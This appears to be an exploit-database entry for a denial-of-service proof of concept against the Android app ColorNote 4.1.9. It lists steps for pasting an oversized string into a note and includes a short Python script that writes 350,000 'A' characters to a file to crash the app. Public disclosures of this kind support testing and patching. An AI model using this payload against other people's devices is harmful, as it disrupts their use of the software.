Share
## https://sploitus.com/exploit?id=PACKETSTORM:162920
# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC)  
# Date: 2021-06-02  
# Author: Brian Rodríguez  
# Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX  
# Version: 4.1.9  
# Category: DoS (Android)  
  
##### Vulnerability #####  
  
Color Note is vulnerable to a DoS condition when a long list of characters is being used.  
  
# STEPS #  
# Open the program  
# Create a new Note.  
# Run the python exploit script payload.py, it will create a new payload.txt file  
# Copy the content of the file "payload.txt"  
# Paste the content from payload.txt in the new note.  
# Click the "Return" button twice.  
# Start clicking the screen.  
# Crashed  
  
Successful exploitation will causes application stop working.  
  
I have been able to test this exploit against Android 8.0.  
  
##### PoC #####  
--> payload.py <--  
#!/usr/bin/env python  
buffer = "\x41" * 350000  
  
try:  
f = open("payload.txt","w")  
f.write(buffer)  
f.close()  
print ("File created")  
except:  
print ("File cannot be created")